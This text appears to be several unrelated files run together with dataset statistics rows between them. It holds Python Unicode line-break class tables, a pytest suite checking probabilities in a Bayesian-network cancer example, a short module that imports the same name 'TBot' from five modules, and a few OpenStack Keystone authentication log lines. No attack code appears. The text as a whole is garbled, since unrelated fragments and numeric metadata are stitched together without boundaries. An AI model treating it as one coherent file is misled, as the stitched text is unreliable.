\ud407\ud409-\ud423\ud425-\ud43f\ud441-\ud45b\ud45d-\ud477\ud479-\ud493\ud495-\ud4af\ud4b1-\ud4cb\ud4cd-\ud4e7\ud4e9-\ud503\ud505-\ud51f\ud521-\ud53b\ud53d-\ud557\ud559-\ud573\ud575-\ud58f\ud591-\ud5ab\ud5ad-\ud5c7\ud5c9-\ud5e3\ud5e5-\ud5ff\ud601-\ud61b\ud61d-\ud637\ud639-\ud653\ud655-\ud66f\ud671-\ud68b\ud68d-\ud6a7\ud6a9-\ud6c3\ud6c5-\ud6df\ud6e1-\ud6fb\ud6fd-\ud717\ud719-\ud733\ud735-\ud74f\ud751-\ud76b\ud76d-\ud787\ud789-\ud7a3",
"hl": "\u05d0-\u05ea\u05f0-\u05f2\ufb1d\ufb1f-\ufb28\ufb2a-\ufb36\ufb38-\ufb3c\ufb3e\ufb40-\ufb41\ufb43-\ufb44\ufb46-\ufb4f",
"hy": "\x5c\x2d",
"id": "\u2e80-\u2e99\u2e9b-\u2ef3\u2f00-\u2fd5\u2ff0-\u2ffb\u3000\u3003-\u3004\u3006-\u3007\u3012-\u3013\u3020-\u3029\u3030-\u303a\u303d-\u303f\u3042\u3044\u3046\u3048\u304a-\u3062\u3064-\u3082\u3084\u3086\u3088-\u308d\u308f-\u3094\u309f\u30a2\u30a4\u30a6\u30a8\u30aa-\u30c2\u30c4-\u30e2\u30e4\u30e6\u30e8-\u30ed\u30ef-\u30f4\u30f7-\u30fa\u30ff\u3105-\u312d\u3131-\u318e\u3190-\u31ba\u31c0-\u31e3\u3200-\u321e\u3220-\u3247\u3250-\u32fe\u3300-\u4dbf\u4e00-\ua014\ua016-\ua48c\ua490-\ua4c6\uf900-\ufaff\ufe30-\ufe34\ufe45-\ufe46\ufe49-\ufe4f\ufe51\ufe58\ufe5f-\ufe66\ufe68\ufe6b\uff02-\uff03\uff06-\uff07\uff0a-\uff0b\uff0d\uff0f-\uff19\uff1c-\uff1e\uff20-\uff3a\uff3c\uff3e-\uff5a\uff5c\uff5e\uffe2-\uffe4\U0001b000-\U0001b001\U0001f200-\U0001f202\U0001f210-\U0001f23a\U0001f240-\U0001f248\U0001f250-\U0001f251\U00020000-\U0002fffd\U00030000-\U0003fffd",
"in": "\u2024-\u2026\ufe19",
"is": "\x2c\x2e\x3a-\x3b\u037e\u0589\u060c-\u060d\u07f8\u2044\ufe10\ufe13-\ufe14",
"jl": "\u1100-\u115f\ua960-\ua97c",
"jt": "\u11a8-\u11ff\ud7cb-\ud7fb",
"jv": "\u1160-\u11a7\ud7b0-\ud7c6",
"lf": "\x0a",
"nl": "\x85",
"ns": "\u17d6\u203c-\u203d\u2047-\u2049\u3005\u301c\u303b-\u303c\u309b-\u309e\u30a0\u30fb\u30fd-\u30fe\ua015\ufe54-\ufe55\uff1a-\uff1b\uff65\uff9e-\uff9f",
"nu": "\x30-\x39\u0660-\u0669\u066b-\u066c\u06f0-\u06f9\u07c0-\u07c9\u0966-\u096f\u09e6-\u09ef\u0a66-\u0a6f\u0ae6-\u0aef\u0b66-\u0b6f\u0be6-\u0bef\u0c66-\u0c6f\u0ce6-\u0cef\u0d66-\u0d6f\u0e50-\u0e59\u0ed0-\u0ed9\u0f20-\u0f29\u1040-\u1049\u1090-\u1099\u17e0-\u17e9\u1810-\u1819\u1946-\u194f\u19d0-\u19d9\u1a80-\u1a89\u1a90-\u1a99\u1b50-\u1b59\u1bb0-\u1bb9\u1c40-\u1c49\u1c50-\u1c59\ua620-\ua629\ua8d0-\ua8d9\ua900-\ua909\ua9d0-\ua9d9\uaa50-\uaa59\uabf0-\uabf9\U000104a0-\U000104a9\U00011066-\U0001106f\U000110f0-\U000110f9\U00011136-\U0001113f\U000111d0-\U000111d9\U000116c0-\U000116c9\U0001d7ce-\U0001d7ff",
"op": "\x28\x5c\x5b\x7b\xa1\xbf\u0f3a\u0f3c\u169b\u201a\u201e\u2045\u207d\u208d\u2329\u2768\u276a\u276c\u276e\u2770\u2772\u2774\u27c5\u27e6\u27e8\u27ea\u27ec\u27ee\u2983\u2985\u2987\u2989\u298b\u298d\u298f\u2991\u2993\u2995\u2997\u29d8\u29da\u29fc\u2e18\u2e22\u2e24\u2e26\u2e28\u3008\u300a\u300c\u300e\u3010\u3014\u3016\u3018\u301a\u301d\ufd3e\ufe17\ufe35\ufe37\ufe39\ufe3b\ufe3d\ufe3f\ufe41\ufe43\ufe47\ufe59\ufe5b\ufe5d\uff08\uff3b\uff5b\uff5f\uff62\U00013258-\U0001325a\U00013286\U00013288\U00013379",
"po": "\x25\xa2\xb0\u0609-\u060b\u066a\u09f2-\u09f3\u09f9\u0d79\u2030-\u2037\u20a7\u20b6\u2103\u2109\ua838\ufdfc\ufe6a\uff05\uffe0",
"pr": "\x24\x2b\x5c\x5c\xa3-\xa5\xb1\u058f\u09fb\u0af1\u0bf9\u0e3f\u17db\u20a0-\u20a6\u20a8-\u20b5\u20b7-\u20b9\u2116\u2212-\u2213\ufe69\uff04\uffe1\uffe5-\uffe6",
"qu": "\x22\x27\xab\xbb\u2018-\u2019\u201b-\u201d\u201f\u2039-\u203a\u275b-\u275e\u2e00-\u2e0d\u2e1c-\u2e1d\u2e20-\u2e21",
"sa": "\u0e01-\u0e3a\u0e40-\u0e4e\u0e81-\u0e82\u0e84\u0e87-\u0e88\u0e8a\u0e8d\u0e94-\u0e97\u0e99-\u0e9f\u0ea1-\u0ea3\u0ea5\u0ea7\u0eaa-\u0eab\u0ead-\u0eb9\u0ebb-\u0ebd\u0ec0-\u0ec4\u0ec6\u0ec8-\u0ecd\u0edc-\u0edf\u1000-\u103f\u1050-\u108f\u109a-\u109f\u1780-\u17d3\u17d7\u17dc-\u17dd\u1950-\u196d\u1970-\u1974\u1980-\u19ab\u19b0-\u19c9\u19da\u19de-\u19df\u1a20-\u1a5e\u1a60-\u1a7c\u1aa0-\u1aad\uaa60-\uaa7b\uaa80-\uaac2\uaadb-\uaadf",
"sg": "\ud800-\udfff",
"sp": "\x20",
"sy": "\x2f",
"wj": "\u2060\ufeff",
"xx": "\u0378-\u0379\u037f-\u0383\u038b\u038d\u03a2\u0528-\u0530\u0557-\u0558\u0560\u0588\u058b-\u058e\u0590\u05c8-\u05cf\u05eb-\u05ef\u05f5-\u05ff\u0605\u061c-\u061d\u070e\u074b-\u074c\u07b2-\u07bf\u07fb-\u07ff\u082e-\u082f\u083f\u085c-\u085d\u085f-\u089f\u08a1\u08ad-\u08e3\u08ff\u0978\u0980\u0984\u098d-\u098e\u0991-\u0992\u09a9\u09b1\u09b3-\u09b5\u09ba-\u09bb\u09c5-\u09c6\u09c9-\u09ca\u09cf-\u09d6\u09d8-\u09db\u09de\u09e4-\u09e5\u09fc-\u0a00\u0a04\u0a0b-\u0a0e\u0a11-\u0a12\u0a29\u0a31\u0a34\u0a37\u0a3a-\u0a3b\u0a3d\u0a43-\u0a46\u0a49-\u0a4a\u0a4e-\u0a50\u0a52-\u0a58\u0a5d\u0a5f-\u0a65\u0a76-\u0a80\u0a84\u0a8e\u0a92\u0aa9\u0ab1\u0ab4\u0aba-\u0abb\u0ac6\u0aca\u0ace-\u0acf\u0ad1-\u0adf\u0ae4-\u0ae5\u0af2-\u0b00\u0b04\u0b0d-\u0b0e\u0b11-\u0b12\u0b29\u0b31\u0b34\u0b3a-\u0b3b\u0b45-\u0b46\u0b49-\u0b4a\u0b4e-\u0b55\u0b58-\u0b5b\u0b5e\u0b64-\u0b65\u0b78-\u0b81\u0b84\u0b8b-\u0b8d\u0b91\u0b96-\u0b98\u0b9b\u0b9d\u0ba0-\u0ba2\u0ba5-\u0ba7\u0bab-\u0bad\u0bba-\u0bbd\u0bc3-\u0bc5\u0bc9\u0bce-\u0bcf\u0bd1-\u0bd6\u0bd8-\u0be5\u0bfb-\u0c00\u0c04\u0c0d\u0c11\u0c29\u0c34\u0c3a-\u0c3c\u0c45\u0c49\u0c4e-\u0c54\u0c57\u0c5a-\u0c5f\u0c64-\u0c65\u0c70-\u0c77\u0c80-\u0c81\u0c84\u0c8d\u0c91\u0ca9\u0cb4\u0cba-\u0cbb\u0cc5\u0cc9\u0cce-\u0cd4\u0cd7-\u0cdd\u0cdf\u0ce4-\u0ce5\u0cf0\u0cf3-\u0d01\u0d04\u0d0d\u0d11\u0d3b-\u0d3c\u0d45\u0d49\u0d4f-\u0d56\u0d58-\u0d5f\u0d64-\u0d65\u0d76-\u0d78\u0d80-\u0d81\u0d84\u0d97-\u0d99\u0db2\u0dbc\u0dbe-\u0dbf\u0dc7-\u0dc9\u0dcb-\u0dce\u0dd5\u0dd7\u0de0-\u0df1\u0df5-\u0e00\u0e3b-\u0e3e\u0e5c-\u0e80\u0e83\u0e85-\u0e86\u0e89\u0e8b-\u0e8c\u0e8e-\u0e93\u0e98\u0ea0\u0ea4\u0ea6\u0ea8-\u0ea9\u0eac\u0eba\u0ebe-\u0ebf\u0ec5\u0ec7\u0ece-\u0ecf\u0eda-\u0edb\u0ee0-\u0eff\u0f48\u0f6d-\u0f70\u0f98\u0fbd\u0fcd\u0fdb-\u0fff\u10c6\u10c8-\u10cc\u10ce-\u10cf\u1249\u124e-\u124f\u1257\u1259\u125e-\u125f\u1289\u128e-\u128f\u12b1\u12b6-\u12b7\u12bf\u12c1\u12c6-\u12c7\u12d7\u1311\u1316-\u1317\u135b-\u135c\u137d-\u137f\u139a-\u139f\u13f5-\u13ff\u169d-\u169f\u16f1-\u16ff\u170d\u1715-\u171f\u1737-\u173f\u1754-\u175f\u176d\u1771\u1774-\u177f\u17de-\u17df\u17ea-\u17ef\u17fa-\u17ff\u180f\u181a-\u181f\u1878-\u187f\u18ab-\u18af\u18f6-\u18ff\u191d-\u191f\u192c-\u192f\u193c-\u193f\u1941-\u1943\u196e-\u196f\u1975-\u197f\u19ac-\u19af\u19ca-\u19cf\u19db-\u19dd\u1a1c-\u1a1d\u1a5f\u1a7d-\u1a7e\u1a8a-\u1a8f\u1a9a-\u1a9f\u1aae-\u1aff\u1b4c-\u1b4f\u1b7d-\u1b7f\u1bf4-\u1bfb\u1c38-\u1c3a\u1c4a-\u1c4c\u1c80-\u1cbf\u1cc8-\u1ccf\u1cf7-\u1cff\u1de7-\u1dfb\u1f16-\u1f17\u1f1e-\u1f1f\u1f46-\u1f47\u1f4e-\u1f4f\u1f58\u1f5a\u1f5c\u1f5e\u1f7e-\u1f7f\u1fb5\u1fc5\u1fd4-\u1fd5\u1fdc\u1ff0-\u1ff1\u1ff5\u1fff\u2065-\u2069\u2072-\u2073\u208f\u209d-\u209f\u20ba-\u20cf\u20f1-\u20ff\u218a-\u218f\u23f4-\u23ff\u2427-\u243f\u244b-\u245f\u2700\u2b4d-\u2b4f\u2b5a-\u2bff\u2c2f\u2c5f\u2cf4-\u2cf8\u2d26\u2d28-\u2d2c\u2d2e-\u2d2f\u2d68-\u2d6e\u2d71-\u2d7e\u2d97-\u2d9f\u2da7\u2daf\u2db7\u2dbf\u2dc7\u2dcf\u2dd7\u2ddf\u2e3c-\u2e7f\u2e9a\u2ef4-\u2eff\u2fd6-\u2fef\u2ffc-\u2fff\u3040\u3097-\u3098\u3100-\u3104\u312e-\u3130\u318f\u31bb-\u31bf\u31e4-\u31ef\u321f\u32ff\ua48d-\ua48f\ua4c7-\ua4cf\ua62c-\ua63f\ua698-\ua69e\ua6f8-\ua6ff\ua78f\ua794-\ua79f\ua7ab-\ua7f7\ua82c-\ua82f\ua83a-\ua83f\ua878-\ua87f\ua8c5-\ua8cd\ua8da-\ua8df\ua8fc-\ua8ff\ua954-\ua95e\ua97d-\ua97f\ua9ce\ua9da-\ua9dd\ua9e0-\ua9ff\uaa37-\uaa3f\uaa4e-\uaa4f\uaa5a-\uaa5b\uaa7c-\uaa7f\uaac3-\uaada\uaaf7-\uab00\uab07-\uab08\uab0f-\uab10\uab17-\uab1f\uab27\uab2f-\uabbf\uabee-\uabef\uabfa-\uabff\ud7a4-\ud7af\ud7c7-\ud7ca\ud7fc-\ud7ff\ue000-\uf8ff\ufb07-\ufb12\ufb18-\ufb1c\ufb37\ufb3d\ufb3f\ufb42\ufb45\ufbc2-
\ufbd2\ufd40-\ufd4f\ufd90-\ufd91\ufdc8-\ufdef\ufdfe-\ufdff\ufe1a-\ufe1f\ufe27-\ufe2f\ufe53\ufe67\ufe6c-\ufe6f\ufe75\ufefd-\ufefe\uff00\uffbf-\uffc1\uffc8-\uffc9\uffd0-\uffd1\uffd8-\uffd9\uffdd-\uffdf\uffe7\uffef-\ufff8\ufffe-\uffff\U0001000c\U00010027\U0001003b\U0001003e\U0001004e-\U0001004f\U0001005e-\U0001007f\U000100fb-\U000100ff\U00010103-\U00010106\U00010134-\U00010136\U0001018b-\U0001018f\U0001019c-\U000101cf\U000101fe-\U0001027f\U0001029d-\U0001029f\U000102d1-\U000102ff\U0001031f\U00010324-\U0001032f\U0001034b-\U0001037f\U0001039e\U000103c4-\U000103c7\U000103d6-\U000103ff\U0001049e-\U0001049f\U000104aa-\U000107ff\U00010806-\U00010807\U00010809\U00010836\U00010839-\U0001083b\U0001083d-\U0001083e\U00010856\U00010860-\U000108ff\U0001091c-\U0001091e\U0001093a-\U0001093e\U00010940-\U0001097f\U000109b8-\U000109bd\U000109c0-\U000109ff\U00010a04\U00010a07-\U00010a0b\U00010a14\U00010a18\U00010a34-\U00010a37\U00010a3b-\U00010a3e\U00010a48-\U00010a4f\U00010a59-\U00010a5f\U00010a80-\U00010aff\U00010b36-\U00010b38\U00010b56-\U00010b57\U00010b73-\U00010b77\U00010b80-\U00010bff\U00010c49-\U00010e5f\U00010e7f-\U00010fff\U0001104e-\U00011051\U00011070-\U0001107f\U000110c2-\U000110cf\U000110e9-\U000110ef\U000110fa-\U000110ff\U00011135\U00011144-\U0001117f\U000111c9-\U000111cf\U000111da-\U0001167f\U000116b8-\U000116bf\U000116ca-\U00011fff\U0001236f-\U000123ff\U00012463-\U0001246f\U00012474-\U00012fff\U0001342f-\U000167ff\U00016a39-\U00016eff\U00016f45-\U00016f4f\U00016f7f-\U00016f8e\U00016fa0-\U0001afff\U0001b002-\U0001cfff\U0001d0f6-\U0001d0ff\U0001d127-\U0001d128\U0001d1de-\U0001d1ff\U0001d246-\U0001d2ff\U0001d357-\U0001d35f\U0001d372-\U0001d3ff\U0001d455\U0001d49d\U0001d4a0-\U0001d4a1\U0001d4a3-\U0001d4a4\U0001d4a7-\U0001d4a8\U0001d4ad\U0001d4ba\U0001d4bc\U0001d4c4\U0001d506\U0001d50b-\U0001d50c\U0001d515\U0001d51d\U0001d53a\U0001d53f\U0001d545\U0001d547-\U0001d549\U0001d551\U0001d6a6-\U0001d6a7\U0001d7cc-\U0001d7cd\U0001d800-\U0001edff\U0001ee04\U0001ee20\U0001ee23\U0001ee25-\U0001ee26\U0001ee28\U0001ee33\U0001ee38\U0001ee3a\U0001ee3c-\U0001ee41\U0001ee43-\U0001ee46\U0001ee48\U0001ee4a\U0001ee4c\U0001ee50\U0001ee53\U0001ee55-\U0001ee56\U0001ee58\U0001ee5a\U0001ee5c\U0001ee5e\U0001ee60\U0001ee63\U0001ee65-\U0001ee66\U0001ee6b\U0001ee73\U0001ee78\U0001ee7d\U0001ee7f\U0001ee8a\U0001ee9c-\U0001eea0\U0001eea4\U0001eeaa\U0001eebc-\U0001eeef\U0001eef2-\U0001efff\U0001f02c-\U0001f02f\U0001f094-\U0001f09f\U0001f0af-\U0001f0b0\U0001f0bf-\U0001f0c0\U0001f0d0\U0001f0e0-\U0001f0ff\U0001f10b-\U0001f10f\U0001f12f\U0001f16c-\U0001f16f\U0001f19b-\U0001f1e5\U0001f203-\U0001f20f\U0001f23b-\U0001f23f\U0001f249-\U0001f24f\U0001f252-\U0001f2ff\U0001f321-\U0001f32f\U0001f336\U0001f37d-\U0001f37f\U0001f394-\U0001f39f\U0001f3c5\U0001f3cb-\U0001f3df\U0001f3f1-\U0001f3ff\U0001f43f\U0001f441\U0001f4f8\U0001f4fd-\U0001f4ff\U0001f53e-\U0001f53f\U0001f544-\U0001f54f\U0001f568-\U0001f5fa\U0001f641-\U0001f644\U0001f650-\U0001f67f\U0001f6c6-\U0001f6ff\U0001f774-\U0001ffff\U0002fffe-\U0002ffff\U0003fffe-\U000e0000\U000e0002-\U000e001f\U000e0080-\U000e00ff\U000e01f0-\U0010ffff",
"zw": "\u200b"
}
ascii_line_break = {
"^ai": "\x00-\U0010ffff",
"^al": "\x00-\x22\x24-\x25\x27-\x29\x2b-\x3b\x3f\x5c\x5b-\x5c\x5d\x7b-\x7d\x7f-\U0010ffff",
"^b2": "\x00-\U0010ffff",
"^ba": "\x00-\x08\x0a-\x7b\x7d-\U0010ffff",
"^bb": "\x00-\U0010ffff",
"^bk": "\x00-\x0a\x0d-\U0010ffff",
"^cb": "\x00-\U0010ffff",
"^cj": "\x00-\U0010ffff",
"^cl": "\x00-\x5c\x7c\x5c\x7e-\U0010ffff",
"^cm": "\x09-\x0d\x20-\x5c\x7e\x80-\U0010ffff",
"^cp": "\x00-\x28\x2a-\x5c\x5c\x5c\x5e-\U0010ffff",
"^cr": "\x00-\x0c\x0e-\U0010ffff",
"^ex": "\x00-\x20\x22-\x3e\x40-\U0010ffff",
"^gl": "\x00-\U0010ffff",
"^h2": "\x00-\U0010ffff",
"^h3": "\x00-\U0010ffff",
"^hl": "\x00-\U0010ffff",
"^hy": "\x00-\x2c\x2e-\U0010ffff",
"^id": "\x00-\U0010ffff",
"^in": "\x00-\U0010ffff",
"^is": "\x00-\x2b\x5c\x2d\x2f-\x39\x3c-\U0010ffff",
"^jl": "\x00-\U0010ffff",
"^jt": "\x00-\U0010ffff",
"^jv": "\x00-\U0010ffff",
"^lf": "\x00-\x09\x0b-\U0010ffff",
"^nl": "\x00-\U0010ffff",
"^ns": "\x00-\U0010ffff",
"^nu": "\x00-\x2f\x3a-\U0010ffff",
"^op": "\x00-\x27\x29-\x5a\x5c\x5c-\x7a\x5c\x7c-\U0010ffff",
"^po": "\x00-\x24\x5c\x26-\U0010ffff",
"^pr": "\x00-\x23\x25-\x2a\x2c-\x5c\x5b\x5c\x5d-\U0010ffff",
"^qu": "\x00-\x21\x23-\x5c\x26\x28-\U0010ffff",
"^sa": "\x00-\U0010ffff",
"^sg": "\x00-\U0010ffff",
"^sp": "\x00-\x1f\x21-\U0010ffff",
"^sy": "\x00-\x2e\x30-\U0010ffff",
"^wj": "\x00-\U0010ffff",
"^xx": "\x00-\x7f",
"^zw": "\x00-\U0010ffff",
"ai": "",
"al": "\x23\x5c\x26\x2a\x3c-\x3e\x40-\x5a\x5c\x5e-\x7a\x5c\x7e",
"b2": "",
"ba": "\x09\x5c\x7c",
"bb": "",
"bk": "\x0b-\x0c",
"cb": "",
"cj": "",
"cl": "\x7d",
"cm": "\x00-\x08\x0e-\x1f\x7f",
"cp": "\x29\x5c\x5d",
"cr": "\x0d",
"ex": "\x21\x3f",
"gl": "",
"h2": "",
"h3": "",
"hl": "",
"hy": "\x5c\x2d",
"id": "",
"in": "",
"is": "\x2c\x2e\x3a-\x3b",
"jl": "",
"jt": "",
"jv": "",
"lf": "\x0a",
"nl": "",
"ns": "",
"nu": "\x30-\x39",
"op": "\x28\x5c\x5b\x7b",
"po": "\x25",
"pr": "\x24\x2b\x5c\x5c",
"qu": "\x22\x27",
"sa": "",
"sg": "",
"sp": "\x20",
"sy": "\x2f",
"wj": "",
"xx": "\x80-\U0010ffff",
"zw": ""
}
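# --- Illustrative sketch, not part of the original module: the tables above
# map UAX #14 line-break classes (e.g. "nu" = numeric, "sp" = space, "op" =
# open punctuation) to regex character classes; keys prefixed with "^" hold
# precomputed complements, and empty values mean the class has no members in
# the ASCII-restricted table. A minimal, hedged example of compiling the
# ascii_line_break table into per-class matchers:
import re
ascii_patterns = {
    key: re.compile("[" + chars + "]")
    for key, chars in ascii_line_break.items()
    if chars  # skip classes with no members in this table
}
assert ascii_patterns["nu"].match("7")   # "7" is in the numeric class
assert ascii_patterns["sp"].match(" ")   # " " is in the space class
assert ascii_patterns["^nu"].match("a")  # "a" is outside the numeric class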
| 414.558282
| 8,080
| 0.776908
| 9,600
| 67,573
| 5.468125
| 0.467396
| 0.004572
| 0.000686
| 0.000914
| 0.614413
| 0.57799
| 0.560921
| 0.519717
| 0.494076
| 0.472054
| 0
| 0.418487
| 0.014088
| 67,573
| 162
| 8,081
| 417.117284
| 0.369463
| 0.000829
| 0
| 0.15
| 1
| 0.2875
| 0.97156
| 0.957222
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
db69408c9223e3093a0e568467e6c4c0ff4e7312
| 4,657
|
py
|
Python
|
bayesian/test/examples/bbns/test_cancer.py
|
timgates42/bayesian-belief-networks
|
23c3e3ce1c7f99d83efb79f9b7798af2a1537e1c
|
[
"Apache-2.0"
] | 734
|
2015-01-05T21:25:01.000Z
|
2022-03-16T12:12:20.000Z
|
bayesian/test/examples/bbns/test_cancer.py
|
timgates42/bayesian-belief-networks
|
23c3e3ce1c7f99d83efb79f9b7798af2a1537e1c
|
[
"Apache-2.0"
] | 11
|
2015-01-20T16:22:48.000Z
|
2021-05-12T13:01:11.000Z
|
bayesian/test/examples/bbns/test_cancer.py
|
timgates42/bayesian-belief-networks
|
23c3e3ce1c7f99d83efb79f9b7798af2a1537e1c
|
[
"Apache-2.0"
] | 222
|
2015-01-06T09:28:53.000Z
|
2022-03-04T10:38:32.000Z
|
'''Test the cancer example as a BBN.'''
from bayesian.bbn import build_bbn
from bayesian.examples.bbns.cancer import fP, fS, fC, fX, fD
def pytest_funcarg__cancer_graph(request):
g = build_bbn(
fP, fS, fC, fX, fD,
domains={
'P': ['low', 'high']})
return g
def close_enough(x, y, r=3):
return round(x, r) == round(y, r)
class TestCancerGraph():
'''
See table 2.2 of BAI_Chapter2.pdf
For verification of results.
(Note typo in some values)
'''
def test_no_evidence(self, cancer_graph):
'''Column 2 of upper half of table'''
result = cancer_graph.query()
assert close_enough(result[('P', 'high')], 0.1)
assert close_enough(result[('P', 'low')], 0.9)
assert close_enough(result[('S', True)], 0.3)
assert close_enough(result[('S', False)], 0.7)
assert close_enough(result[('C', True)], 0.012)
assert close_enough(result[('C', False)], 0.988)
assert close_enough(result[('X', True)], 0.208)
assert close_enough(result[('X', False)], 0.792)
assert close_enough(result[('D', True)], 0.304)
assert close_enough(result[('D', False)], 0.696)
def test_D_True(self, cancer_graph):
'''Column 3 of upper half of table'''
result = cancer_graph.query(D=True)
assert close_enough(result[('P', 'high')], 0.102)
assert close_enough(result[('P', 'low')], 0.898)
assert close_enough(result[('S', True)], 0.307)
assert close_enough(result[('S', False)], 0.693)
assert close_enough(result[('C', True)], 0.025)
assert close_enough(result[('C', False)], 0.975)
assert close_enough(result[('X', True)], 0.217)
assert close_enough(result[('X', False)], 0.783)
assert close_enough(result[('D', True)], 1)
assert close_enough(result[('D', False)], 0)
def test_S_True(self, cancer_graph):
'''Column 4 of upper half of table'''
result = cancer_graph.query(S=True)
assert close_enough(result[('P', 'high')], 0.1)
assert close_enough(result[('P', 'low')], 0.9)
assert close_enough(result[('S', True)], 1)
assert close_enough(result[('S', False)], 0)
assert close_enough(result[('C', True)], 0.032)
assert close_enough(result[('C', False)], 0.968)
assert close_enough(result[('X', True)], 0.222)
assert close_enough(result[('X', False)], 0.778)
assert close_enough(result[('D', True)], 0.311)
assert close_enough(result[('D', False)], 0.689)
def test_C_True(self, cancer_graph):
'''Column 5 of upper half of table'''
result = cancer_graph.query(C=True)
assert close_enough(result[('P', 'high')], 0.249)
assert close_enough(result[('P', 'low')], 0.751)
assert close_enough(result[('S', True)], 0.825)
assert close_enough(result[('S', False)], 0.175)
assert close_enough(result[('C', True)], 1)
assert close_enough(result[('C', False)], 0)
assert close_enough(result[('X', True)], 0.9)
assert close_enough(result[('X', False)], 0.1)
assert close_enough(result[('D', True)], 0.650)
assert close_enough(result[('D', False)], 0.350)
def test_C_True_S_True(self, cancer_graph):
'''Column 6 of upper half of table'''
result = cancer_graph.query(C=True, S=True)
assert close_enough(result[('P', 'high')], 0.156)
assert close_enough(result[('P', 'low')], 0.844)
assert close_enough(result[('S', True)], 1)
assert close_enough(result[('S', False)], 0)
assert close_enough(result[('C', True)], 1)
assert close_enough(result[('C', False)], 0)
assert close_enough(result[('X', True)], 0.9)
assert close_enough(result[('X', False)], 0.1)
assert close_enough(result[('D', True)], 0.650)
assert close_enough(result[('D', False)], 0.350)
def test_D_True_S_True(self, cancer_graph):
'''Column 7 of upper half of table'''
result = cancer_graph.query(D=True, S=True)
assert close_enough(result[('P', 'high')], 0.102)
assert close_enough(result[('P', 'low')], 0.898)
assert close_enough(result[('S', True)], 1)
assert close_enough(result[('S', False)], 0)
assert close_enough(result[('C', True)], 0.067)
assert close_enough(result[('C', False)], 0.933)
assert close_enough(result[('X', True)], 0.247)
assert close_enough(result[('X', False)], 0.753)
assert close_enough(result[('D', True)], 1)
assert close_enough(result[('D', False)], 0)
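# Hedged sketch, not part of the original test: in this library the imported
# factors (fP, fS, fC, fX, fD) are plain functions whose parameter names bind
# the BBN variables and whose return value is a (conditional) probability.
# Sketched priors consistent with the no-evidence column asserted above,
# i.e. P(P='high') = 0.1 and P(S=True) = 0.3; the real definitions, including
# the CPTs for fC, fX and fD, live in bayesian.examples.bbns.cancer.
def fP_sketch(P):
    return 0.1 if P == 'high' else 0.9
def fS_sketch(S):
    return 0.3 if S else 0.7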
| 42.336364
| 60
| 0.594804
| 669
| 4,657
| 3.99701
| 0.158445
| 0.250935
| 0.381451
| 0.516081
| 0.835826
| 0.809648
| 0.799925
| 0.512341
| 0.501496
| 0.469708
| 0
| 0.052222
| 0.22697
| 4,657
| 109
| 61
| 42.724771
| 0.690556
| 0.06764
| 0
| 0.361446
| 0
| 0
| 0.025683
| 0
| 0
| 0
| 0
| 0
| 0.722892
| 1
| 0.096386
| false
| 0
| 0.024096
| 0.012048
| 0.156627
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dbb6d0a05a6e3897af909f905708ada70741eb64
| 134
|
py
|
Python
|
botomatic/__init__.py
|
xeila00/botomatic
|
f5a5dcb528b6c77766ffb5ce24f4086081536cf5
|
[
"BSD-2-Clause"
] | null | null | null |
botomatic/__init__.py
|
xeila00/botomatic
|
f5a5dcb528b6c77766ffb5ce24f4086081536cf5
|
[
"BSD-2-Clause"
] | null | null | null |
botomatic/__init__.py
|
xeila00/botomatic
|
f5a5dcb528b6c77766ffb5ce24f4086081536cf5
|
[
"BSD-2-Clause"
] | null | null | null |
from botomatic import TBot
from bookbookgoose import TBot
from magic8ball import TBot
from __init__ import TBot
from bc_l import TBot
| 22.333333
| 30
| 0.850746
| 21
| 134
| 5.190476
| 0.428571
| 0.458716
| 0.513761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008772
| 0.149254
| 134
| 5
| 31
| 26.8
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
915b5d9d2556938b997978083bca0a3a09df6982
| 8,512
|
wsgi
|
Python
|
Day 3/keystone.common.wsgi
|
AgentKD6-37/2022-01-04-Python
|
668d7fda3fb5143f4790d7b3497987db083c00a9
|
[
"MIT"
] | 1
|
2022-01-14T18:08:04.000Z
|
2022-01-14T18:08:04.000Z
|
Day 3/keystone.common.wsgi
|
AgentKD6-37/2022-01-04-Python
|
668d7fda3fb5143f4790d7b3497987db083c00a9
|
[
"MIT"
] | null | null | null |
Day 3/keystone.common.wsgi
|
AgentKD6-37/2022-01-04-Python
|
668d7fda3fb5143f4790d7b3497987db083c00a9
|
[
"MIT"
] | null | null | null |
2017-07-30 17:20:20.455 3279 INFO keystone.common.wsgi [req-b28d7cf9-8591-4629-99a1-bdcd85b046b4 - - - - -] POST http://controller:5000/v3/auth/tokens
2017-07-30 17:20:20.506 3279 WARNING keystone.common.wsgi [req-b28d7cf9-8591-4629-99a1-bdcd85b046b4 - - - - -] Authorization failed. The request you have made requires authentication. from 172.16.1.5
2017-07-30 17:20:22.553 3280 INFO keystone.common.wsgi [req-ef70efb4-0b60-4738-b8ba-204c657aebcc - - - - -] GET http://controller:5000/v3/
2017-07-30 17:20:22.564 3279 INFO keystone.common.wsgi [req-2a491a01-a525-46e6-ba26-b2d53ab02567 - - - - -] POST http://controller:5000/v3/auth/tokens
2017-07-30 17:20:22.727 3279 INFO keystone.token.providers.fernet.utils [req-2a491a01-a525-46e6-ba26-b2d53ab02567 - - - - -] Loaded 2 encryption keys (max_active_keys=3) from: /etc/keystone/fernet-keys/
